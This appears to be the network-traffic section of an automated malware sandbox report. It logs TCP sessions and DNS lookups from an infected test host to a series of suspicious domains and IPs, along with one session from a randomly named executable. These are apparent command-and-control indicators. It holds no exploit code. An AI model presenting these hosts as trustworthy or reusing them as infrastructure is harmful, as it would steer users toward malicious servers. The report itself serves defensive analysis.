                                                                                          Sep 30, 2024 18:45:36.499842882 CEST804972731.31.196.17192.168.2.5
                                                                                          Sep 30, 2024 18:45:36.499996901 CEST4972780192.168.2.531.31.196.17
                                                                                          Sep 30, 2024 18:45:37.330575943 CEST4972780192.168.2.531.31.196.17
                                                                                          Sep 30, 2024 18:45:38.352478981 CEST4972880192.168.2.531.31.196.17
                                                                                          Sep 30, 2024 18:45:38.358123064 CEST804972831.31.196.17192.168.2.5
                                                                                          Sep 30, 2024 18:45:38.360121965 CEST4972880192.168.2.531.31.196.17
                                                                                          Sep 30, 2024 18:45:38.367938042 CEST4972880192.168.2.531.31.196.17
                                                                                          Sep 30, 2024 18:45:38.374247074 CEST804972831.31.196.17192.168.2.5
                                                                                          Sep 30, 2024 18:45:39.050970078 CEST804972831.31.196.17192.168.2.5
                                                                                          Sep 30, 2024 18:45:39.050993919 CEST804972831.31.196.17192.168.2.5
                                                                                          Sep 30, 2024 18:45:39.051167965 CEST4972880192.168.2.531.31.196.17
                                                                                          Sep 30, 2024 18:45:39.054281950 CEST4972880192.168.2.531.31.196.17
                                                                                          Sep 30, 2024 18:45:39.060642004 CEST804972831.31.196.17192.168.2.5
                                                                                          Sep 30, 2024 18:45:44.340513945 CEST4972980192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:44.345390081 CEST80497293.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:44.345523119 CEST4972980192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:44.357346058 CEST4972980192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:44.362211943 CEST80497293.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:44.803666115 CEST80497293.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:44.803733110 CEST4972980192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:45.862255096 CEST4972980192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:45.867284060 CEST80497293.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:46.880894899 CEST4973080192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:46.885817051 CEST80497303.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:46.885911942 CEST4973080192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:46.897329092 CEST4973080192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:46.902223110 CEST80497303.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:47.604343891 CEST80497303.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:47.605004072 CEST80497303.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:47.605021954 CEST4973080192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:47.610028028 CEST4973080192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:48.413942099 CEST4973080192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:48.419111013 CEST80497303.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:49.428239107 CEST4973180192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:49.433222055 CEST80497313.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:49.433295965 CEST4973180192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:49.449060917 CEST4973180192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:49.453958035 CEST80497313.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:49.454037905 CEST80497313.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:49.889275074 CEST80497313.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:49.890045881 CEST4973180192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:50.955575943 CEST4973180192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:50.960545063 CEST80497313.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:51.977936983 CEST4973280192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:51.984338045 CEST80497323.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:51.989964008 CEST4973280192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:51.993941069 CEST4973280192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:51.999953032 CEST80497323.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:52.447935104 CEST80497323.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:52.448338985 CEST80497323.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:52.448503971 CEST4973280192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:52.452944994 CEST4973280192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:52.459444046 CEST80497323.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:57.472338915 CEST4973380192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:57.477210999 CEST80497333.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:57.477332115 CEST4973380192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:57.488435030 CEST4973380192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:57.493341923 CEST80497333.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:57.942615032 CEST80497333.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:45:57.946439981 CEST4973380192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:59.002850056 CEST4973380192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:45:59.010484934 CEST80497333.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:00.021003962 CEST4973480192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:00.026226044 CEST80497343.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:00.030210972 CEST4973480192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:00.042021990 CEST4973480192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:00.046921968 CEST80497343.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:00.490369081 CEST80497343.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:00.491065025 CEST4973480192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:01.566272974 CEST4973480192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:01.573678970 CEST80497343.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:02.585936069 CEST4973580192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:02.592982054 CEST80497353.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:02.593102932 CEST4973580192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:02.604048967 CEST4973580192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:02.609000921 CEST80497353.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:02.609019995 CEST80497353.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:03.052462101 CEST80497353.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:03.052545071 CEST4973580192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:04.166642904 CEST4973580192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:04.172540903 CEST80497353.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:05.178265095 CEST4973680192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:05.244272947 CEST80497363.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:05.244352102 CEST4973680192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:05.251880884 CEST4973680192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:05.257360935 CEST80497363.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:06.630744934 CEST80497363.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:06.630825996 CEST80497363.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:06.630904913 CEST4973680192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:06.633805037 CEST4973680192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:06.638597965 CEST80497363.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:12.228687048 CEST4973780192.168.2.5199.192.21.169
                                                                                          Sep 30, 2024 18:46:12.233620882 CEST8049737199.192.21.169192.168.2.5
                                                                                          Sep 30, 2024 18:46:12.233736038 CEST4973780192.168.2.5199.192.21.169
                                                                                          Sep 30, 2024 18:46:12.244235992 CEST4973780192.168.2.5199.192.21.169
                                                                                          Sep 30, 2024 18:46:12.249160051 CEST8049737199.192.21.169192.168.2.5
                                                                                          Sep 30, 2024 18:46:12.839900970 CEST8049737199.192.21.169192.168.2.5
                                                                                          Sep 30, 2024 18:46:12.839963913 CEST8049737199.192.21.169192.168.2.5
                                                                                          Sep 30, 2024 18:46:12.840051889 CEST4973780192.168.2.5199.192.21.169
                                                                                          Sep 30, 2024 18:46:13.752969027 CEST4973780192.168.2.5199.192.21.169
                                                                                          Sep 30, 2024 18:46:14.771316051 CEST4973880192.168.2.5199.192.21.169
                                                                                          Sep 30, 2024 18:46:14.910134077 CEST8049738199.192.21.169192.168.2.5
                                                                                          Sep 30, 2024 18:46:14.910233974 CEST4973880192.168.2.5199.192.21.169
                                                                                          Sep 30, 2024 18:46:14.922312975 CEST4973880192.168.2.5199.192.21.169
                                                                                          Sep 30, 2024 18:46:14.927541971 CEST8049738199.192.21.169192.168.2.5
                                                                                          Sep 30, 2024 18:46:15.509844065 CEST8049738199.192.21.169192.168.2.5
                                                                                          Sep 30, 2024 18:46:15.509900093 CEST8049738199.192.21.169192.168.2.5
                                                                                          Sep 30, 2024 18:46:15.509965897 CEST4973880192.168.2.5199.192.21.169
                                                                                          Sep 30, 2024 18:46:16.425971031 CEST4973880192.168.2.5199.192.21.169
                                                                                          Sep 30, 2024 18:46:17.444201946 CEST4973980192.168.2.5199.192.21.169
                                                                                          Sep 30, 2024 18:46:17.449861050 CEST8049739199.192.21.169192.168.2.5
                                                                                          Sep 30, 2024 18:46:17.449938059 CEST4973980192.168.2.5199.192.21.169
                                                                                          Sep 30, 2024 18:46:17.465114117 CEST4973980192.168.2.5199.192.21.169
                                                                                          Sep 30, 2024 18:46:17.470196962 CEST8049739199.192.21.169192.168.2.5
                                                                                          Sep 30, 2024 18:46:17.470319986 CEST8049739199.192.21.169192.168.2.5
                                                                                          Sep 30, 2024 18:46:18.148269892 CEST8049739199.192.21.169192.168.2.5
                                                                                          Sep 30, 2024 18:46:18.148330927 CEST8049739199.192.21.169192.168.2.5
                                                                                          Sep 30, 2024 18:46:18.150197029 CEST4973980192.168.2.5199.192.21.169
                                                                                          Sep 30, 2024 18:46:18.971477032 CEST4973980192.168.2.5199.192.21.169
                                                                                          Sep 30, 2024 18:46:19.990300894 CEST4974080192.168.2.5199.192.21.169
                                                                                          Sep 30, 2024 18:46:19.995717049 CEST8049740199.192.21.169192.168.2.5
                                                                                          Sep 30, 2024 18:46:19.998102903 CEST4974080192.168.2.5199.192.21.169
                                                                                          Sep 30, 2024 18:46:20.004842043 CEST4974080192.168.2.5199.192.21.169
                                                                                          Sep 30, 2024 18:46:20.010301113 CEST8049740199.192.21.169192.168.2.5
                                                                                          Sep 30, 2024 18:46:20.598527908 CEST8049740199.192.21.169192.168.2.5
                                                                                          Sep 30, 2024 18:46:20.598581076 CEST8049740199.192.21.169192.168.2.5
                                                                                          Sep 30, 2024 18:46:20.598814011 CEST4974080192.168.2.5199.192.21.169
                                                                                          Sep 30, 2024 18:46:20.601948977 CEST4974080192.168.2.5199.192.21.169
                                                                                          Sep 30, 2024 18:46:20.606801033 CEST8049740199.192.21.169192.168.2.5
                                                                                          Sep 30, 2024 18:46:25.657496929 CEST4974180192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:25.662563086 CEST80497413.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:25.662638903 CEST4974180192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:25.713385105 CEST4974180192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:25.718386889 CEST80497413.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:26.311675072 CEST80497413.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:26.314021111 CEST4974180192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:27.221226931 CEST4974180192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:27.226202965 CEST80497413.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:28.344153881 CEST4974280192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:28.349153042 CEST80497423.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:28.349239111 CEST4974280192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:28.368000984 CEST4974280192.168.2.53.33.130.190
                                                                                          Sep 30, 2024 18:46:28.375370979 CEST80497423.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:29.737200975 CEST80497423.33.130.190192.168.2.5
                                                                                          Sep 30, 2024 18:46:29.738123894 CEST4974280192.168.2.53.33.130.190
Sep 30, 2024 18:46:29.877942085 CEST | 49742 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:46:29.882842064 CEST | 80 | 49742 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:46:30.945161104 CEST | 49743 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:46:31.445936918 CEST | 80 | 49743 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:46:31.446026087 CEST | 49743 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:46:31.459141970 CEST | 49743 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:46:31.464020014 CEST | 80 | 49743 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:46:31.464242935 CEST | 80 | 49743 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:46:31.920974016 CEST | 80 | 49743 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:46:31.922116041 CEST | 49743 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:46:32.971259117 CEST | 49743 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:46:32.976421118 CEST | 80 | 49743 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:46:34.009954929 CEST | 49744 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:46:34.014890909 CEST | 80 | 49744 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:46:34.016103983 CEST | 49744 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:46:34.023124933 CEST | 49744 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:46:34.028105021 CEST | 80 | 49744 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:46:34.481323957 CEST | 80 | 49744 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:46:34.481354952 CEST | 80 | 49744 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:46:34.481837034 CEST | 49744 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:46:34.484368086 CEST | 49744 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:46:34.489880085 CEST | 80 | 49744 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:46:39.510593891 CEST | 49745 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:46:39.515628099 CEST | 80 | 49745 | 188.114.96.3 | 192.168.2.5
Sep 30, 2024 18:46:39.515700102 CEST | 49745 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:46:39.529092073 CEST | 49745 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:46:39.534900904 CEST | 80 | 49745 | 188.114.96.3 | 192.168.2.5
Sep 30, 2024 18:46:40.039232969 CEST | 80 | 49745 | 188.114.96.3 | 192.168.2.5
Sep 30, 2024 18:46:40.040517092 CEST | 80 | 49745 | 188.114.96.3 | 192.168.2.5
Sep 30, 2024 18:46:40.040590048 CEST | 49745 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:46:41.033628941 CEST | 49745 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:46:42.053970098 CEST | 49746 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:46:42.059146881 CEST | 80 | 49746 | 188.114.96.3 | 192.168.2.5
Sep 30, 2024 18:46:42.059431076 CEST | 49746 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:46:42.069973946 CEST | 49746 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:46:42.074873924 CEST | 80 | 49746 | 188.114.96.3 | 192.168.2.5
Sep 30, 2024 18:46:42.538909912 CEST | 80 | 49746 | 188.114.96.3 | 192.168.2.5
Sep 30, 2024 18:46:42.540323019 CEST | 80 | 49746 | 188.114.96.3 | 192.168.2.5
Sep 30, 2024 18:46:42.546070099 CEST | 49746 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:46:43.581784964 CEST | 49746 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:46:44.599180937 CEST | 49747 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:46:44.604350090 CEST | 80 | 49747 | 188.114.96.3 | 192.168.2.5
Sep 30, 2024 18:46:44.604600906 CEST | 49747 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:46:44.614772081 CEST | 49747 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:46:44.619895935 CEST | 80 | 49747 | 188.114.96.3 | 192.168.2.5
Sep 30, 2024 18:46:44.619908094 CEST | 80 | 49747 | 188.114.96.3 | 192.168.2.5
Sep 30, 2024 18:46:45.068811893 CEST | 80 | 49747 | 188.114.96.3 | 192.168.2.5
Sep 30, 2024 18:46:45.069700956 CEST | 80 | 49747 | 188.114.96.3 | 192.168.2.5
Sep 30, 2024 18:46:45.069786072 CEST | 49747 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:46:46.127399921 CEST | 49747 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:46:47.174294949 CEST | 49748 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:46:47.179524899 CEST | 80 | 49748 | 188.114.96.3 | 192.168.2.5
Sep 30, 2024 18:46:47.179590940 CEST | 49748 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:46:47.186758995 CEST | 49748 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:46:47.192430973 CEST | 80 | 49748 | 188.114.96.3 | 192.168.2.5
Sep 30, 2024 18:46:47.677134037 CEST | 80 | 49748 | 188.114.96.3 | 192.168.2.5
Sep 30, 2024 18:46:47.677592993 CEST | 80 | 49748 | 188.114.96.3 | 192.168.2.5
Sep 30, 2024 18:46:47.677650928 CEST | 49748 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:46:47.681945086 CEST | 49748 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:46:47.686954975 CEST | 80 | 49748 | 188.114.96.3 | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 30, 2024 18:44:30.263058901 CEST | 51622 | 53 | 192.168.2.5 | 1.1.1.1
Sep 30, 2024 18:44:30.568319082 CEST | 53 | 51622 | 1.1.1.1 | 192.168.2.5
Sep 30, 2024 18:44:46.333885908 CEST | 62738 | 53 | 192.168.2.5 | 1.1.1.1
Sep 30, 2024 18:44:46.347861052 CEST | 53 | 62738 | 1.1.1.1 | 192.168.2.5
Sep 30, 2024 18:44:59.490360975 CEST | 54750 | 53 | 192.168.2.5 | 1.1.1.1
Sep 30, 2024 18:44:59.504785061 CEST | 53 | 54750 | 1.1.1.1 | 192.168.2.5
Sep 30, 2024 18:45:13.271548986 CEST | 55145 | 53 | 192.168.2.5 | 1.1.1.1
Sep 30, 2024 18:45:13.989140987 CEST | 53 | 55145 | 1.1.1.1 | 192.168.2.5
Sep 30, 2024 18:45:29.990216970 CEST | 65209 | 53 | 192.168.2.5 | 1.1.1.1
Sep 30, 2024 18:45:30.088645935 CEST | 53 | 65209 | 1.1.1.1 | 192.168.2.5
Sep 30, 2024 18:45:44.181812048 CEST | 59037 | 53 | 192.168.2.5 | 1.1.1.1
Sep 30, 2024 18:45:44.335098028 CEST | 53 | 59037 | 1.1.1.1 | 192.168.2.5
Sep 30, 2024 18:45:57.459255934 CEST | 64181 | 53 | 192.168.2.5 | 1.1.1.1
Sep 30, 2024 18:45:57.469362974 CEST | 53 | 64181 | 1.1.1.1 | 192.168.2.5
Sep 30, 2024 18:46:11.650046110 CEST | 50436 | 53 | 192.168.2.5 | 1.1.1.1
Sep 30, 2024 18:46:12.226269960 CEST | 53 | 50436 | 1.1.1.1 | 192.168.2.5
Sep 30, 2024 18:46:25.622725010 CEST | 54554 | 53 | 192.168.2.5 | 1.1.1.1
Sep 30, 2024 18:46:25.651401997 CEST | 53 | 54554 | 1.1.1.1 | 192.168.2.5
Sep 30, 2024 18:46:39.492805004 CEST | 65397 | 53 | 192.168.2.5 | 1.1.1.1
Sep 30, 2024 18:46:39.507623911 CEST | 53 | 65397 | 1.1.1.1 | 192.168.2.5
Sep 30, 2024 18:46:53.115156889 CEST | 60833 | 53 | 192.168.2.5 | 1.1.1.1
Sep 30, 2024 18:46:53.167988062 CEST | 53 | 60833 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 30, 2024 18:44:30.263058901 CEST | 192.168.2.5 | 1.1.1.1 | 0x743 | Standard query (0) | www.dxeg.lol | A (IP address) | IN (0x0001) | false
Sep 30, 2024 18:44:46.333885908 CEST | 192.168.2.5 | 1.1.1.1 | 0x6487 | Standard query (0) | www.bqberw.vip | A (IP address) | IN (0x0001) | false
Sep 30, 2024 18:44:59.490360975 CEST | 192.168.2.5 | 1.1.1.1 | 0x71cb | Standard query (0) | www.weatherbook.live | A (IP address) | IN (0x0001) | false
Sep 30, 2024 18:45:13.271548986 CEST | 192.168.2.5 | 1.1.1.1 | 0x1e98 | Standard query (0) | www.cc101.pro | A (IP address) | IN (0x0001) | false
Sep 30, 2024 18:45:29.990216970 CEST | 192.168.2.5 | 1.1.1.1 | 0x65b3 | Standard query (0) | www.dverkom.store | A (IP address) | IN (0x0001) | false
Sep 30, 2024 18:45:44.181812048 CEST | 192.168.2.5 | 1.1.1.1 | 0xe31c | Standard query (0) | www.crowsecurity.cloud | A (IP address) | IN (0x0001) | false
Sep 30, 2024 18:45:57.459255934 CEST | 192.168.2.5 | 1.1.1.1 | 0x4582 | Standard query (0) | www.multileveltravel.world | A (IP address) | IN (0x0001) | false
Sep 30, 2024 18:46:11.650046110 CEST | 192.168.2.5 | 1.1.1.1 | 0xe517 | Standard query (0) | www.technectar.top | A (IP address) | IN (0x0001) | false
Sep 30, 2024 18:46:25.622725010 CEST | 192.168.2.5 | 1.1.1.1 | 0xb271 | Standard query (0) | www.linkwave.cloud | A (IP address) | IN (0x0001) | false
Sep 30, 2024 18:46:39.492805004 CEST | 192.168.2.5 | 1.1.1.1 | 0x7ee7 | Standard query (0) | www.bayarcepat19.click | A (IP address) | IN (0x0001) | false
Sep 30, 2024 18:46:53.115156889 CEST | 192.168.2.5 | 1.1.1.1 | 0x4c27 | Standard query (0) | www.queima.shop | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 30, 2024 18:44:30.568319082 CEST | 1.1.1.1 | 192.168.2.5 | 0x743 | No error (0) | www.dxeg.lol | a22.dxzz.top | - | CNAME (Canonical name) | IN (0x0001) | false
Sep 30, 2024 18:44:30.568319082 CEST | 1.1.1.1 | 192.168.2.5 | 0x743 | No error (0) | a22.dxzz.top | dxzz.top | - | CNAME (Canonical name) | IN (0x0001) | false
Sep 30, 2024 18:44:30.568319082 CEST | 1.1.1.1 | 192.168.2.5 | 0x743 | No error (0) | dxzz.top | - | 137.175.33.56 | A (IP address) | IN (0x0001) | false
Sep 30, 2024 18:44:46.347861052 CEST | 1.1.1.1 | 192.168.2.5 | 0x6487 | No error (0) | www.bqberw.vip | bqberw.vip | - | CNAME (Canonical name) | IN (0x0001) | false
Sep 30, 2024 18:44:46.347861052 CEST | 1.1.1.1 | 192.168.2.5 | 0x6487 | No error (0) | bqberw.vip | - | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Sep 30, 2024 18:44:46.347861052 CEST | 1.1.1.1 | 192.168.2.5 | 0x6487 | No error (0) | bqberw.vip | - | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Sep 30, 2024 18:44:59.504785061 CEST | 1.1.1.1 | 192.168.2.5 | 0x71cb | No error (0) | www.weatherbook.live | weatherbook.live | - | CNAME (Canonical name) | IN (0x0001) | false
Sep 30, 2024 18:44:59.504785061 CEST | 1.1.1.1 | 192.168.2.5 | 0x71cb | No error (0) | weatherbook.live | - | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Sep 30, 2024 18:44:59.504785061 CEST | 1.1.1.1 | 192.168.2.5 | 0x71cb | No error (0) | weatherbook.live | - | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Sep 30, 2024 18:45:13.989140987 CEST | 1.1.1.1 | 192.168.2.5 | 0x1e98 | No error (0) | www.cc101.pro | - | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Sep 30, 2024 18:45:13.989140987 CEST | 1.1.1.1 | 192.168.2.5 | 0x1e98 | No error (0) | www.cc101.pro | - | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Sep 30, 2024 18:45:30.088645935 CEST | 1.1.1.1 | 192.168.2.5 | 0x65b3 | No error (0) | www.dverkom.store | - | 31.31.196.17 | A (IP address) | IN (0x0001) | false
Sep 30, 2024 18:45:44.335098028 CEST | 1.1.1.1 | 192.168.2.5 | 0xe31c | No error (0) | www.crowsecurity.cloud | crowsecurity.cloud | - | CNAME (Canonical name) | IN (0x0001) | false
Sep 30, 2024 18:45:44.335098028 CEST | 1.1.1.1 | 192.168.2.5 | 0xe31c | No error (0) | crowsecurity.cloud | - | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Sep 30, 2024 18:45:44.335098028 CEST | 1.1.1.1 | 192.168.2.5 | 0xe31c | No error (0) | crowsecurity.cloud | - | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Sep 30, 2024 18:45:57.469362974 CEST | 1.1.1.1 | 192.168.2.5 | 0x4582 | No error (0) | www.multileveltravel.world | multileveltravel.world | - | CNAME (Canonical name) | IN (0x0001) | false
Sep 30, 2024 18:45:57.469362974 CEST | 1.1.1.1 | 192.168.2.5 | 0x4582 | No error (0) | multileveltravel.world | - | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Sep 30, 2024 18:45:57.469362974 CEST | 1.1.1.1 | 192.168.2.5 | 0x4582 | No error (0) | multileveltravel.world | - | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Sep 30, 2024 18:46:12.226269960 CEST | 1.1.1.1 | 192.168.2.5 | 0xe517 | No error (0) | www.technectar.top | - | 199.192.21.169 | A (IP address) | IN (0x0001) | false
Sep 30, 2024 18:46:25.651401997 CEST | 1.1.1.1 | 192.168.2.5 | 0xb271 | No error (0) | www.linkwave.cloud | linkwave.cloud | - | CNAME (Canonical name) | IN (0x0001) | false
Sep 30, 2024 18:46:25.651401997 CEST | 1.1.1.1 | 192.168.2.5 | 0xb271 | No error (0) | linkwave.cloud | - | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Sep 30, 2024 18:46:25.651401997 CEST | 1.1.1.1 | 192.168.2.5 | 0xb271 | No error (0) | linkwave.cloud | - | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Sep 30, 2024 18:46:39.507623911 CEST | 1.1.1.1 | 192.168.2.5 | 0x7ee7 | No error (0) | www.bayarcepat19.click | - | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Sep 30, 2024 18:46:39.507623911 CEST | 1.1.1.1 | 192.168.2.5 | 0x7ee7 | No error (0) | www.bayarcepat19.click | - | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Sep 30, 2024 18:46:53.167988062 CEST | 1.1.1.1 | 192.168.2.5 | 0x4c27 | No error (0) | www.queima.shop | queima.shop | - | CNAME (Canonical name) | IN (0x0001) | false
Sep 30, 2024 18:46:53.167988062 CEST | 1.1.1.1 | 192.168.2.5 | 0x4c27 | No error (0) | queima.shop | - | 84.32.84.32 | A (IP address) | IN (0x0001) | false
                                                                                          • www.dxeg.lol
                                                                                          • www.bqberw.vip
                                                                                          • www.weatherbook.live
                                                                                          • www.cc101.pro
                                                                                          • www.dverkom.store
                                                                                          • www.crowsecurity.cloud
                                                                                          • www.multileveltravel.world
                                                                                          • www.technectar.top
                                                                                          • www.linkwave.cloud
                                                                                          • www.bayarcepat19.click
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49711 | 137.175.33.56 | 80 | 1220 | C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
Timestamp | Bytes transferred | Direction | Data
